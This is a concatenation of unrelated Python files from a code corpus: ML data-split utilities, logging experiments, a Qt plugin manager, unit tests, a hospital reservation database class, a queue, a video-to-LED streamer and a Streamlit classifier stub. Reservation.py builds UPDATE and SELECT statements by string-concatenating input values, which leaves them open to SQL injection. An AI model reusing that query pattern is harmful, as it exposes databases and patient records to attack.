
\n\n\n@cli.command(help='Use a trained model to predict the image classes from test data in the data-folder.')\n@click.argument('folder')\ndef predict(folder):\n    '''\n    Predicts whether images in the test data set are dogs or cats.\n\n    The given folder must contain the following sub-folders:\n        train/\n        test/\n        valid/\n\n    Arguments:\n\n    folder -- The root folder of the training, test, and validation data sets.\n    '''\n    folder_path = os.path.normpath(folder)\n\n    click.echo('Validating data folder %s' % (folder_path,))\n\n    validateFolder(folder_path)\n    validateFolder(os.path.join(folder_path, TRAIN_FOLDER))\n    validateFolder(os.path.join(folder_path, VALID_FOLDER))\n    validateFolder(os.path.join(folder_path, TEST_FOLDER))\n\n    click.echo('Predicting using data from %s' % (folder_path,))\n\n    click.echo('Finished predicting using data from %s.' %\n               (folder_path,))\n\n@cli.command(help='Splits part of source_folder contents into dest_folder.')\n@click.option('--percent', default=20, help='Size of validation data set as percent of all files.')\n@click.argument('source_folder')\n@click.argument('dest_folder')\ndef split(source_folder, dest_folder, percent):\n    '''\n    Moves a subset of the contents of source_folder into dest_folder.\n    '''\n    source_folder = os.path.normpath(source_folder)\n    dest_folder = os.path.normpath(dest_folder)\n\n    click.echo('Splitting [%s%%] of data set from folder [%s] into folder [%s].' % (\n        percent, source_folder, dest_folder))\n\n    validateFolder(source_folder)\n\n    if not os.path.exists(dest_folder):\n        if TEST_ONLY:\n            click.echo('TEST: creating folder [%s]' % (dest_folder,))\n        else:\n            os.makedirs(dest_folder)\n\n    file_paths = getFilePaths(source_folder)\n    selected_paths = selectRandomPaths(source_folder, percent)\n\n    click.echo('Selected [%s] random files of [%s] from [%s]' %\n               (len(selected_paths), len(file_paths), source_folder))\n\n    moveFiles(selected_paths, source_folder, dest_folder)\n    click.echo('Finished splitting [%s%%] of data set from folder [%s] into folder [%s].' %\n               (percent, source_folder, dest_folder))\n\n\n@cli.command(help='Create a sample data set from folder contents.')\n@click.option('--percent', default=1, help='Size of sample data set as percent of source data set.')\n@click.argument('source_folder')\n@click.argument('dest_folder')\ndef sample(source_folder, dest_folder, percent):\n    '''\n    Copies a percentage of the files in source_folder into dest_folder.\n    '''\n    click.echo('Creating sample dataset using [%s%%] of [%s] contents into folder [%s]' %\n               (percent, source_folder, dest_folder))\n\n    validateFolder(source_folder)\n\n    if not os.path.exists(dest_folder):\n        if TEST_ONLY:\n            click.echo('TEST: creating folder [%s]' % (dest_folder,))\n        else:\n            os.makedirs(dest_folder)\n\n    file_paths = getFilePaths(source_folder)\n    selected_paths = selectRandomPaths(source_folder, percent)\n\n    click.echo('Selected [%s] random files of [%s] from [%s]' %\n               (len(selected_paths), len(file_paths), source_folder))\n\n    copyFiles(selected_paths, source_folder, dest_folder)\n    click.echo('Finished copying [%s%%] of data set from folder [%s] into folder [%s].' 
%\n (percent, source_folder, dest_folder))\n\n\ndef validateFolder(folder):\n '''\n Assert that the given folder exists.\n\n Arguments:\n\n folder -- The folder to validate.\n '''\n assert os.path.exists(folder), 'Folder [%s] does not exist' % folder\n\n\ndef selectRandomPaths(folder_path, percent):\n '''\n Randomly select a subset of files from the given folder.\n\n Return a sequence containing the paths to the selected files.\n '''\n file_paths = getFilePaths(folder_path)\n selected_paths = selectRandomPercent(file_paths, percent)\n\n return selected_paths\n\n\ndef getFilePaths(folder_path, file_match=None):\n '''\n Return a list of path names contained within the folder identified by folder_path.\n Optionally filter the result to match the file name pattern specified by file_match.\n Returned paths are not absolute; they are relative to the folder_path argument.\n\n Keyword arguments:\n\n folder_path -- Path to the folder containing the files.\n\n file_match -- Optional file name pattern by which to filter the result.\n '''\n file_paths = []\n for root, dirs, files in os.walk(folder_path):\n filtered_paths = [os.path.relpath(\n os.path.join(root, f), folder_path) for f in files]\n if file_match:\n filtered_paths = fnmatch.filter(filtered_paths, file_match)\n\n file_paths += filtered_paths\n\n return file_paths\n\n\ndef selectRandomPercent(source_seq, percent):\n '''\n Randomly select elements from source_seq such that the\n number of selected elements comprises the given percentage of the\n total number of elements in the sequence.\n\n Return a sequence containing the selected elements.\n The original sequence isn't changed.\n\n Arguments:\n\n source_seq -- A sequence containing the set of elements from which to select.\n\n percent -- The percentage of source_seq elements to select.\n '''\n select_count = int(len(source_seq) * percent / 100.0)\n selected_seq = random.sample(source_seq, select_count)\n\n return selected_seq\n\n\ndef moveFiles(paths, source_folder, dest_folder):\n '''\n Move all the files in the paths array from the source_folder to the dest_folder.\n\n The files to move are represented using relative paths, relative to both the\n source_folder and dest_folder.\n\n If dest_folder doesn't exist, it will be created, down to the leafmost level.\n\n Arguments:\n\n paths -- List of relative paths identifying the files to move.\n\n source_folder -- Path to the folder containing the files to move.\n\n dest_folder -- Path to the folder into which the files will be moved.\n '''\n for path in paths:\n source_path = os.path.join(source_folder, path)\n dest_path = os.path.join(dest_folder, path)\n dest_parent_path = os.path.dirname(dest_path)\n\n if not os.path.exists(dest_parent_path):\n if TEST_ONLY:\n click.echo('TEST: creating folder %s' % (dest_parent_path,))\n else:\n os.makedirs(dest_parent_path)\n\n if TEST_ONLY:\n click.echo('TEST: Moving %s to %s' % (source_path, dest_path))\n else:\n click.echo('Moving %s to %s' % (source_path, dest_path))\n shutil.move(source_path, dest_path)\n\n click.echo('Moved %s files from %s to %s' %\n (len(paths), source_folder, dest_folder))\n\n\ndef copyFiles(paths, source_folder, dest_folder):\n '''\n Copy all the files in the paths array from the source_folder to the dest_folder.\n\n The files to move are represented using relative paths, relative to both the\n source_folder and dest_folder.\n\n If dest_folder doesn't exist, it will be created, down to the leafmost level.\n\n Arguments:\n\n paths -- List of relative paths identifying the files 
to copy.\n\n source_folder -- Path to the folder containing the files to copy.\n\n dest_folder -- Path to the folder into which the files will be copied.\n '''\n for path in paths:\n source_path = os.path.join(source_folder, path)\n dest_path = os.path.join(dest_folder, path)\n dest_parent_path = os.path.dirname(dest_path)\n\n if not os.path.exists(dest_parent_path):\n if TEST_ONLY:\n click.echo('TEST: creating folder %s' % (dest_parent_path,))\n else:\n os.makedirs(dest_parent_path)\n\n if TEST_ONLY:\n click.echo('TEST: Copying %s to %s' % (source_path, dest_path))\n else:\n click.echo('Copying %s to %s' % (source_path, dest_path))\n shutil.copy(source_path, dest_path)\n\n click.echo('Copied %s files from %s to %s' %\n (len(paths), source_folder, dest_folder))\n","sub_path":"deeplearning1/nbs/lesson2-cli.py","file_name":"lesson2-cli.py","file_ext":"py","file_size_in_byte":10741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367279944","text":"\nfrom SVLog import NickModul\nimport logging\nfrom logging import log\nimport logging.config\n\nclass Car:\n def Test(self):\n print(\"First\")\n \n \n class Audi:\n def remove():\n print(\"Yes\")\n\nCar = Car()\nCar.Test()\nCar.Audi.remove()\n\n\nlogging.config.fileConfig(fname='file.conf', disable_existing_loggers=False)\n\n#NickModul.config.fileConfig\n\nlogging.config.fileConfig('logging.conf')\n\n# create logger\nlogger = logging.getLogger('simpleExample')\n\n# 'application' code\nlogger.debug('debug message')\nlogger.info('info message')\nlogger.warning('warn message')\nlogger.error('error message')\nlogger.critical('critical message')\n\n\n\n'''\n# create logger with 'spam_application'\nlogger = logging.getLogger('spam_application')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('spam2.log')\nprint(fh)\n#fh.setLevel(logging.DEBUG)\n# create console handler with a higher log level\nch = logging.StreamHandler()\n#ch.setLevel(logging.ERROR)\n# create formatter and add it to the handlers\n# add the handlers to the logger\nlogger.addHandler(fh)\nprint(logger)\nlogger.addHandler(ch)\n\nlogger.info('creating an instance of auxiliary_module.Auxiliary')\n'''\n\nprint('__________________________________________________')\n\n\nprint(\"test1\")\nprint(\"-----\")\nprint(\"test2\")\nprint(\"-----\")\nh1_getLogger = logging.getLogger('Test')\nprint(\"test3\")\nprint(h1_getLogger)\nprint(\"-----\")\nprint(\"test4\")\nprint(type(h1_getLogger))\nprint(\"-----\")\n\nprint('___________________________________________________')\n\nclass LogginNick:\n def data(self, method):\n method = method\n\n global h1\n if method == 'getLogger':\n name = 'Test'\n h1 = logging.getLogger(name)\n print(h1)\n \n elif method == 'logger.warning':\n h1.warning(\"This is a logging message\")\n \n elif method == 'logger.debug':\n h1.debug(\"This is a debug Log\")\n \n else:\n pass\n\n\nLoggingNick = LogginNick()\nprint(type(LoggingNick.data('getLogger')))\nLoggingNick.data('logger.warning')\n\n\nh1 = logging.getLogger(\"Test\")\nh1.warning(\"This is log test warning\")\n\n\nprint(\"------------------------------------------\")\n\n\n'''\nclass Car:\n<<<<<<< HEAD\n=======\n<<<<<<< HEAD\n\n def decide(self, method):\n if method == 'testlogger':\n Car.Audi('TestLog')\n elif method == 'testwarning':\n Car.motor('This is a warning')\n\n def Audi(self, name):\n self.h1_logger = logging.getLogger(name)\n return self.h1_logger\n \n def motor(self, msg):\n 
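The selectRandomPercent helper in the lesson2-cli.py record reduces to random.sample with a computed count; a standalone illustration of the same idea (the file names are made up):

import random

paths = ['img_%03d.jpg' % i for i in range(200)]
percent = 10
picked = random.sample(paths, int(len(paths) * percent / 100.0))
print(len(picked))   # 20; the original list is left unchanged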
self.h1_logger.warning(msg)\n\n\n=======\n>>>>>>> Branch2_only_one_class\n def Audi(self, modell):\n print(modell)\n self.price1 = 20\n return self.price1\n \n def motor(self):\n total_power = self.price1 *10\n print(f\"This is a new M-Modell with a price of {total_power} $\")\n<<<<<<< HEAD\n\n \n\n=======\n\n \n\n>>>>>>> master\n>>>>>>> Branch2_only_one_class\nclass BMW:\n print(\"Test1\")\n def msport(self):\n print(\"Test2\")\n self.price_total = self.price1 *100\n print(f\"This is a new M-Modell with a toalprice of {self.price_total} $\")\n\n\nCar = Car()\nprint(\"----------------------\")\n<<<<<<< HEAD\n=======\n<<<<<<< HEAD\n\nCar.decide('testlogger')\nprint(\"_________________\")\nCar.decide('testwarning')\n\nprint(\"----------------------\")\n'''\narguments = [{'test':'something'}]\nprint(arguments)\nprint(arguments[0])\n\n\n'''\n\nclass Auto(Car):\n def newengine(self, newPs):\n x = Car.engine + newPs\n print(x)\n\n\n\n\ncar = Car()\ncar.engine(150)\n\nAuto = Auto()\nAuto.newengine(100)\n\n'''\n\nprint(\"------------------------------------------\")\n\ny = (23, 4332)\nz = {'marke': 'BMW', 'art': 'X3', 'leistung': '160PS'}\n#car.Audi(*y, **z)\n\n\nprint(\" heeeeelllllllloooooo \")\n\n\n","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"357108840","text":"# ADOBE CONFIDENTIAL\n#\n# Copyright 2019 Adobe\n# All Rights Reserved.\n#\n# NOTICE: Adobe permits you to use, modify, and distribute this file in\n# accordance with the terms of the Adobe license agreement accompanying it.\n# If you have received this file from a source other than Adobe,\n# then your use, modification, or distribution of it requires the prior\n# written permission of Adobe.\n#\n\nimport os\nimport sys\nimport json\n\nimport sd\nfrom PySide2 import QtCore, QtWidgets\n\nfrom .pluginmanagermodel import PluginTreeModel\nfrom .installpackage import installPackage\n\n## Plugin manager dialog.\nclass PluginManagerDialog(QtWidgets.QDialog):\n def __init__(self, pluginMgr, parent=None):\n super(PluginManagerDialog, self).__init__(parent=parent)\n\n self.__pluginMgr = pluginMgr\n\n self.setWindowTitle(self.tr(\"Plugin Manager\"))\n self.setFocusPolicy(QtCore.Qt.NoFocus)\n\n # Create the widgets.\n dialogLayout = QtWidgets.QVBoxLayout(self)\n\n filterEntry = QtWidgets.QLineEdit()\n filterEntry.setPlaceholderText(self.tr(\"Filter\"))\n dialogLayout.addWidget(filterEntry)\n\n self.__model = PluginTreeModel(pluginMgr, self)\n self.__proxyModel = QtCore.QSortFilterProxyModel(self)\n self.__proxyModel.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)\n self.__proxyModel.setSourceModel(self.__model)\n self.__proxyModel.setFilterKeyColumn(0)\n self.__proxyModel.setRecursiveFilteringEnabled(True)\n\n self.__treeView = QtWidgets.QTreeView()\n self.__treeView.setUniformRowHeights(True)\n self.__treeView.setTextElideMode(QtCore.Qt.ElideLeft)\n self.__treeView.setModel(self.__proxyModel)\n self.__treeView.header().setStretchLastSection(False)\n self.__treeView.header().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n self.__treeView.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)\n self.__treeView.sortByColumn(0, QtCore.Qt.AscendingOrder)\n self.__treeView.setSortingEnabled(True)\n self.__treeView.expandAll()\n dialogLayout.addWidget(self.__treeView)\n\n buttonBox = QtWidgets.QDialogButtonBox()\n browseBtn = QtWidgets.QPushButton(self.tr(\"BROWSE...\"))\n 
buttonBox.addButton(browseBtn, QtWidgets.QDialogButtonBox.ActionRole)\n\n installBtn = QtWidgets.QPushButton(self.tr(\"INSTALL...\"))\n buttonBox.addButton(installBtn, QtWidgets.QDialogButtonBox.ActionRole)\n\n refreshBtn = QtWidgets.QPushButton(self.tr(\"REFRESH\"))\n buttonBox.addButton(refreshBtn, QtWidgets.QDialogButtonBox.ActionRole)\n dialogLayout.addWidget(buttonBox)\n\n # Connect signals.\n filterEntry.textChanged.connect(self.__proxyModel.setFilterFixedString)\n browseBtn.pressed.connect(self.__onBrowsePlugin)\n installBtn.pressed.connect(self.__onInstallPlugin)\n refreshBtn.pressed.connect(self.__onRefreshModel)\n\n self.__treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.__treeView.customContextMenuRequested.connect(self.__onShowContextMenu)\n\n def __onShowContextMenu(self, point):\n index = self.__treeView.indexAt(point)\n index = self.__proxyModel.mapToSource(index)\n\n if not index.isValid() or index.column() != 0:\n return\n\n item = index.internalPointer()\n if item.isRoot():\n return\n\n menu = QtWidgets.QMenu()\n menu.addAction(\n self.tr(\"Show in File Browser...\"),\n lambda: item.showInFileBrowser())\n\n if item.isLeaf() and item.isLoaded():\n menu.addAction(\n self.tr(\"Reload\"),\n lambda: self.__model.reloadPlugin(index))\n\n menu.exec_(self.__treeView.viewport().mapToGlobal(point))\n\n def __onBrowsePlugin(self):\n fileName = QtWidgets.QFileDialog.getOpenFileName(\n self,\n self.tr(\"Open Plugin\"),\n None,\n self.tr(\"Plugin Package (pluginInfo.json);;Python Module (__init__.py);;Python Files (*.py)\"))[0]\n\n if fileName != \"\":\n # Find the plugin name and the directory.\n pluginDir = os.path.dirname(fileName)\n fileName = os.path.basename(fileName)\n\n if fileName == \"pluginInfo.json\":\n # The user picked a plugin installed from a package.\n pluginName = os.path.basename(pluginDir)\n elif fileName == \"__init__.py\":\n # The user picked a module. Adjust the plugin name and dir.\n pluginName = os.path.basename(pluginDir)\n pluginDir = os.path.dirname(pluginDir)\n else:\n # The user picked a python file. 
Simply remove the python extension.\n pluginName = fileName.replace(\".py\", \"\")\n\n # Add the plugin dir to the path, so that it can be imported.\n if not pluginDir in sys.path:\n sys.path.append(pluginDir)\n\n # Load the plugin and update the model.\n plugin = self.__pluginMgr.loadPlugin(pluginName, pluginDir)\n index = self.__model.newPluginLoaded(plugin)\n\n # Expand the plugin directory group (by default new groups are not expanded).\n proxyIndex = self.__proxyModel.mapFromSource(index)\n self.__treeView.setExpanded(proxyIndex, True)\n\n def __onInstallPlugin(self):\n fileName = QtWidgets.QFileDialog.getOpenFileName(\n self,\n self.tr(\"Install Plugin Package\"),\n None,\n self.tr(\"Plugin Package (*.sdplugin)\"))[0]\n\n if fileName != \"\":\n try:\n index = installPackage(fileName, self.__pluginMgr, self.__model)\n\n # Expand the new plugin directory group (by default new groups are not expanded).\n proxyIndex = self.__proxyModel.mapFromSource(index)\n self.__treeView.setExpanded(proxyIndex, True)\n except Exception as err:\n QtWidgets.QMessageBox.critical(\n self,\n self.tr(\"Error installing plugin package:\"),\n str(err),\n QtWidgets.QMessageBox.Ok)\n\n def __onRefreshModel(self):\n self.__model.refreshModel()\n self.__treeView.expandAll()\n\nclass PluginManagerUI(object):\n __pluginMgr = None\n __uiMgr = None\n __menu = None\n __pluginMgrAct = None\n __dialog = None\n\n @classmethod\n def initialize(cls):\n ctx = sd.getContext()\n app = ctx.getSDApplication()\n\n cls.__uiMgr = app.getQtForPythonUIMgr()\n cls.__pluginMgr = app.getPluginMgr()\n\n if cls.__uiMgr:\n cls.__menu = cls.__uiMgr.findMenuFromObjectName(\"Pfx.Editor.Menu.Tools\")\n if cls.__menu:\n cls.__menu.addSeparator()\n\n cls.__pluginMgrAct = QtWidgets.QAction(\n QtCore.QCoreApplication.translate(\"PluginManagerUI\", \"Plugin Manager...\"),\n cls.__menu)\n cls.__pluginMgrAct.triggered.connect(cls.__onShowPluginManager)\n cls.__menu.addAction(cls.__pluginMgrAct)\n\n @classmethod\n def uninitialize(cls):\n if cls.__pluginMgrAct:\n cls.__menu.removeAction(cls.__pluginMgrAct)\n\n @classmethod\n def __onShowPluginManager(cls):\n if not cls.__dialog:\n cls.__dialog = PluginManagerDialog(cls.__pluginMgr, parent=cls.__uiMgr.getMainWindow())\n cls.__dialog.setAttribute(QtCore.Qt.WA_DeleteOnClose, False)\n cls.__dialog.setAttribute(QtCore.Qt.WA_ShowWithoutActivating, True)\n cls.__dialog.resize(550, 350)\n\n cls.__dialog.show()\n","sub_path":"SDPython/designer/pluginmanagerui.py","file_name":"pluginmanagerui.py","file_ext":"py","file_size_in_byte":7680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423661541","text":"import app\nimport json\nfrom mock import patch\nimport os\nimport unittest\n\n\nclass TestGettingInfo(unittest.TestCase):\n\n def setUp(self):\n current_path = str(os.path.dirname(os.path.abspath(__file__)))\n f_directories = os.path.join(current_path, 'fixtures/directories.json')\n f_documents = os.path.join(current_path, 'fixtures/documents.json')\n with open(f_directories, 'r+') as f:\n self.dirs = json.load(f)\n with open(f_documents, 'r+') as f:\n self.docs = json.load(f)\n\n def tearDown(self):\n current_path = str(os.path.dirname(os.path.abspath(__file__)))\n f_directories = os.path.join(current_path, 'fixtures/directories.json')\n f_documents = os.path.join(current_path, 'fixtures/documents.json')\n with open(f_documents, 'r') as f:\n app.documents = json.load(f)\n with open(f_directories, 'r+') as f:\n app.directories = json.load(f)\n\n 
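The filter wiring in the PluginManagerDialog record is the standard Qt proxy-model pattern: the view reads from a QSortFilterProxyModel layered over the real model, and a line edit drives the filter string. A stripped-down sketch of just that wiring, with a string-list model standing in for the plugin tree model (call app.exec_() to actually show it):

import sys
from PySide2 import QtCore, QtWidgets

app = QtWidgets.QApplication(sys.argv)

model = QtCore.QStringListModel(['alpha', 'beta', 'gamma'])
proxy = QtCore.QSortFilterProxyModel()
proxy.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
proxy.setSourceModel(model)

view = QtWidgets.QListView()
view.setModel(proxy)                                   # the view sees filtered rows only
entry = QtWidgets.QLineEdit()
entry.textChanged.connect(proxy.setFilterFixedString)  # same slot the record connects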
@patch('builtins.input', side_effect=['11-2'])\n    def test_get_name_from_number(self, input):\n        self.assertEqual(app.get_doc_owner_name(), 'Геннадий Покемонов')\n\n    def test_get_names(self, *args):\n        self.assertEqual(sorted(list(app.get_all_doc_owners_names())), sorted([doc['name'] for doc in self.docs]))\n\n    def test_show_info(self):\n        for doc in self.docs:\n            info = '{} \"{}\" \"{}\"'.format(doc['type'], doc['number'], doc['name'])\n            self.assertEqual(app.show_document_info(doc), info)\n\n    def test_add_doc(self):\n        app.append_doc_to_shelf('3365', '3')\n        self.assertEqual(app.directories['3'][-1], '3365')\n\n    @patch('builtins.input', side_effect=['11-2'])\n    def test_del_doc(self, input):\n        app.delete_doc()\n        self.assertEqual(len(app.documents), 2)\n\n    def test_remove_from_shelf(self):\n        app.remove_doc_from_shelf('10006')\n        self.assertFalse(app.directories['2'])\n\n\nif __name__ == '__main__':\n    suite_1 = unittest.TestLoader().loadTestsFromTestCase(TestGettingInfo)\n    unittest.TextTestRunner(verbosity=2).run(suite_1)\n","sub_path":"Netology_homeworks/Homework_tests/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548805729","text":"from database import *\nfrom flask_login import UserMixin\n\nclass MedicalReport(UserMixin):\n    def __init__(self, reservationid, patientid, hospitalid, doctorid, departmentid, diseaseid, comment, updatedate, createdate, reservationdate, reservationhour):\n        self.ReservationID = reservationid\n        self.PatientID = patientid\n        self.HospitalID = hospitalid\n        self.DoctorID = doctorid\n        self.DepartmentID = departmentid\n        self.DiseaseID = diseaseid\n        self.Comment = comment\n        self.UpdateDate = updatedate\n        self.CreateDate = createdate\n        self.ReservationDate = reservationdate\n        self.ReservationHour = reservationhour\n\nclass ReservationDatabase:\n    @classmethod\n    def add_reservation(cls, patientid, hospitalid, doctorid, departmentid, diseaseid, comment, reservationdate, reservationhour):\n        with dbapi2.connect(database.config) as connection:\n            cursor = connection.cursor()\n            query = \"\"\"INSERT INTO Reservation(PatientID, HospitalID, DoctorID, DepartmentID, DiseaseID, Comment, CreateDate, ReservationDate, ReservationHour) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n            try:\n                cursor.execute(query, (str(patientid), str(hospitalid), str(doctorid), str(departmentid), str(diseaseid), str(comment), datetime.datetime.now(), str(reservationdate), str(reservationhour)))\n            except dbapi2.Error:\n                connection.rollback()\n                return -1\n            else:\n                connection.commit()\n            cursor.close()\n            return 1\n    @classmethod\n    def update_reservation(cls, reservationid, patientid, hospitalid, doctorid, departmentid, diseaseid, comment, reservationdate, reservationhour):\n        with dbapi2.connect(database.config) as connection:\n            cursor = connection.cursor()\n\n            query = 'UPDATE Reservation SET UpdateDate = ' + \"'\" + str(datetime.datetime.now()) + \"'\"\n\n            if patientid != '' and patientid is not None:\n                query = query + \", PatientID = '\" + str(patientid) + \"'\"\n            if hospitalid != '' and hospitalid is not None:\n                query = query + \", HospitalID = '\" + str(hospitalid) + \"'\"\n            if doctorid != '' and doctorid is not None:\n                query = query + \", DoctorID = '\" + str(doctorid) + \"'\"\n            if departmentid != '' and departmentid is not None:\n                query = query + \", DepartmentID = '\" + str(departmentid) + \"'\"\n            if diseaseid != '' and diseaseid is not None:\n                query = query + \", DiseaseID = '\" 
+ str(diseaseid) + \"'\"\n            if comment != '' and comment is not None:\n                query = query + \", Comment = '\" + str(comment) + \"'\"\n            if reservationdate != '' and reservationdate is not None:\n                query = query + \", ReservationDate = '\" + str(reservationdate) + \"'\"\n            if reservationhour != '' and reservationhour is not None:\n                query = query + \", ReservationHour = '\" + str(reservationhour) + \"'\"\n            query = query + ' WHERE ReservationId = ' + str(reservationid)\n\n            try:\n                cursor.execute(query)\n            except dbapi2.Error:\n                connection.rollback()\n            else:\n                connection.commit()\n            cursor.close()\n        return\n\n    @classmethod\n    def select_all_reservation_info(cls, patientid):\n        with dbapi2.connect(database.config) as connection:\n            cursor = connection.cursor()\n            reservationInfo = None\n\n            if patientid == '' or patientid == None:\n                query = \"\"\"SELECT * FROM Reservation\"\"\"\n            else:\n                query = 'SELECT * FROM ReservationInfo WHERE PatientID = ' + patientid\n            try:\n                cursor.execute(query,)\n                reservationInfo = cursor.fetchall()\n\n            except dbapi2.Error:\n                connection.rollback()\n            else:\n                connection.commit()\n\n            if reservationInfo:\n                return reservationInfo\n            else:\n                return -1\n\n    @classmethod\n    def select_reservation_info(cls, patientid):\n        with dbapi2.connect(database.config) as connection:\n            cursor = connection.cursor()\n            reservationInfo = None\n\n            query = \"\"\"SELECT res.PatientID, res.ReservationID, res.DoctorID, res.HospitalID, res.DepartmentID, \n                        res.DiseaseID, res.Comment, res.ReservationDate, res.ReservationHour \n                        FROM PatientInfo p, Reservation res\n                        WHERE p.PatientID = res.PatientID AND p.PatientID = %s\"\"\"\n            try:\n                cursor.execute(query, (str(patientid),))\n                reservationInfo = cursor.fetchone()\n\n            except dbapi2.Error:\n                connection.rollback()\n            else:\n                connection.commit()\n\n            if reservationInfo:\n                reservationInfo2 = [reservationInfo[0], reservationInfo[1], reservationInfo[2], reservationInfo[3], reservationInfo[4],\n                                    reservationInfo[5], reservationInfo[6], reservationInfo[7], reservationInfo[8]]\n                return reservationInfo2\n            else:\n                return []","sub_path":"Reservation.py","file_name":"Reservation.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"465359324","text":"from typing import Any\n\n\nclass Node:\n    \"\"\"A node of a doubly linked list has a value and two node references\"\"\"\n    def __init__(self, value: Any) -> None:\n        self.value: Any = value\n        self.prev: Node = None\n        self.next: Node = None\n\n\nclass SimpleQueue:\n    \"\"\"A doubly linked list\"\"\"\n    def __init__(self) -> None:\n        self._head: Node = None\n        self._tail: Node = None\n\n    def append(self, value: Any) -> None:\n        \"\"\"Adds node with specified value at end of queue\"\"\"\n        new_node = Node(value)\n        try:  # Assume queue is not empty\n            new_node.next = self._tail\n            self._tail.prev = new_node\n            self._tail = new_node\n        except AttributeError:  # Queue is empty\n            self._head = new_node\n            self._tail = new_node\n\n    def popleft(self) -> Any:\n        \"\"\"Removes node at beginning of queue and returns its value\"\"\"\n        value = self._head.value\n        self._head = self._head.prev\n        try:  # Delete reference to removed node\n            self._head.next = None\n        except AttributeError:  # Queue became empty\n            self._tail = None\n        return value\n\n    \n\n","sub_path":"week3/simplequeue.py","file_name":"simplequeue.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
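With the tail pointer now updated in append() (the line added above), SimpleQueue behaves as a FIFO; previously the third append relinked a stale tail node, so popleft returned values out of order. A small usage check, assuming the class is importable from the record's module path:

from simplequeue import SimpleQueue  # per the record: week3/simplequeue.py

q = SimpleQueue()
for v in (1, 2, 3):
    q.append(v)
print(q.popleft(), q.popleft(), q.popleft())  # 1 2 3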
+{"seq_id":"602843463","text":"import youtube_dl\nimport cv2\nimport numpy as np\nimport sys\nimport matelight\nimport time\n\nip = \"api.matelight.rocks\"\nport = 1337\n\nlink = \"\"\n\ncanny = True\n\nwidth = 0\nheight = 0\n\nframeskip = 1000\n\n\nif not len(sys.argv) == 5:\n\tprint(\"Usage: %s <ip> <port> <link> <canny>\" % (sys.argv[0]))\n\texit(1)\n\nelse:\n\tip = sys.argv[1]\n\tport = int(sys.argv[2])\n\n\tlink = sys.argv[3]\n\n\tcanny = sys.argv[4].lower() == \"true\"\n\n\twidth = 40\n\theight = 16\n\nydl = youtube_dl.YoutubeDL({'outtmpl': '%(id)s%(ext)s'})\n\nwith ydl:\n    result = ydl.extract_info(\n        link,\n        download=False # We just want to extract the info\n    )\n\nif 'entries' in result:\n    # Can be a playlist or a list of videos\n    v = result['entries']\n    t = \"playlist\"\nelse:\n    # Just a video\n    v = result\n    t = \"single\"\n\ndef processVideo(video):\n\turl = video['requested_formats'][0]['url']\n\tfps = int(video['fps'])\n\n\tdelay = 0\n\n\tvid = cv2.VideoCapture(url)\n\tret = True\n\n\tlframe = frame = np.zeros((height, width,1 if canny else 3), np.uint8)\n\n\twhile ret:\n\t\t#print(\"-\")\n\t\tpre_frame_time = time.time()\n\n\t\tlframe = frame\n\n\t\tret, frame = vid.read()\n\t\tif not ret: # read() returns (False, None) at end of stream\n\t\t\tbreak\n\t\tframe = cv2.resize(frame, (width, height))\n\n\t\tscreen = [[(0, 0, 0) for x in range(0, width)] for y in range(0, height)]\n\t\tfor x in range(0, width):\n\t\t\tfor y in range(0, height):\n\t\t\t\t#print((frame[y][x][0], frame[y][x][1], frame[y][x][2]))\n\t\t\t\tscreen[y][x] = (frame[y][x][2], frame[y][x][1], frame[y][x][0])\n\t\tmatelight.send_frame(frame)\n\t\tdt = time.time() - pre_frame_time\n\t\tframes_per_second = 1 / float(dt)\n\n\t\tprint(\"%d fps\" % (frames_per_second))\n\n\nmatelight.open_socket(ip, port)\n\nif t == \"single\":\n\tprocessVideo(v)\nelif t == \"playlist\":\n\tfor video_ in v:\n\t\tprocessVideo(video_)\n","sub_path":"youtubemate.py","file_name":"youtubemate.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
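A generic version of the capture loop fixed above: cv2.VideoCapture.read() returns (False, None) once the stream ends, so the frame must be checked before it is resized. Self-contained apart from needing a readable video source:

import cv2

def frames(source, size=(40, 16)):
    cap = cv2.VideoCapture(source)
    while True:
        ret, frame = cap.read()
        if not ret:               # stream exhausted or decode error
            break
        yield cv2.resize(frame, size)
    cap.release()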
+{"seq_id":"251228951","text":"# Dependencies and Libraries\nfrom fastai.vision.all import *\nfrom fastai.vision.widgets import *\nfrom io import BytesIO, StringIO\n\nimport os\nimport sys\nimport streamlit as st\nimport pandas as pd\n\nst.set_page_config(\n    page_title=None,\n    page_icon=\"🖼️\", \n    layout='centered', \n    initial_sidebar_state='auto')\n\nSTYLE = \"\"\"\n\n\"\"\"\n\n# Load model\npath = Path()\nlearn_inf = load_learner(path/'export.pkl', cpu=True)\n\n@st.cache(allow_output_mutation=True)\nclass FileUpload(object):\n    def __init__(self):\n        self.fileTypes = ['png', 'jpg']\n\n    def app(): \n        st.write(\"\"\"\n        # Video Conference Glitch Detection\n        Task Item #5 Project - Convolutional Neural Network\n        \"\"\")\n        st.write(\"\"\"\n        A prototype image or video classifier that can determine if an uploaded image has visual glitches or whether a video contains graphical glitches.\\n\n        TODO\\n\n        - Video Upload\\n\n        - Incorporate more models for other glitches\\n\n        - Dashboard for descriptive data analytics\\n\n        \"\"\")\n\n        st.markdown(STYLE, unsafe_allow_html=True)\n        file = st.file_uploader(\"Upload image file\", type=['png', 'jpg'])\n        show_file = 